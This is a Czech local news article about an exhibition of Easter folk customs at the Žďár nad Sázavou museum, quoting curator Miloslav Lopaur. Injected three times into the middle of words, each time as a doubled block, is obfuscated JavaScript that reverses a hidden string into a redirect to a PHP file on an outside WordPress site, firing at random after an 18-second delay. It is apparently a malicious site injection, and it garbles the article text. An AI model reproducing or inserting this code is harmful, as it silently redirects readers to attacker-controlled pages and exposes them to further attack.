Rainbow page separator

Velikonoce na Horácku jsou v muzeu k vidění až do 19. května

Pondělí, 15. dubna 2019

Žďár nad Sázavou / Nová výstava s názvem Velikonoce na Horácku aneb Pašijový týden v lidových zvycích a obyčejích je nyní k vidění ve žďárském muzeu. „Cílem bylo vytvořit kus skanzenu v našem muzeu, kde návštěvník zavítá do světnice, části dvora, nahlédne do chléva a kůlny a na kraji lesa uvidí část pašijového průvodu. Výstava prezentuje zvyky a obyčeje od Květné neděle po Velikonoční úterý. K nim je přiřazena ještě Smrtná neděle, kdy děvčata vynášela smrtholku, též Smrť nebo Mařenu, a naopak přinášela nové lé["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to,“ informoval Miloslav Lopaur ze žďárského muzea. Návštěvníci se rovněž dozví, jak vypadalo nové lé["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to v podobě ozdobeného malého jehličnanu, jaké proutky se sbíraly, kdo chodil na koledu či kdo byl zmrskán či poléván vodou. „A také co je ["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to velkopáteční voda, nový oheň, kalvárie nebo křížová cesta. Seznámíme návštěvníky s tím, co se ve který den mělo dělat. K čemu sloužil paškál, větvičky od nového léta, kočičky nebo boží muka. Ve velikonoční světnici jsou k vidění různé typy kraslic a velký důraz byl kladen i na ozdoby, jako je muší ráj, rahno, kočičky nebo velikonoční zeleň v podobě pšenice a hrachu. Zlatým hřebem jsou ukázky z pašijového průvodu, kde jsou znázorněni Kristus, který musel snášet urážky a políčky, sebemrskač, křížovník, Pejcha nebo Obžerství,“ dodal Miloslav Lopaur s tím, že velikonoční výstava je v muzeu k vidění až do 19. května.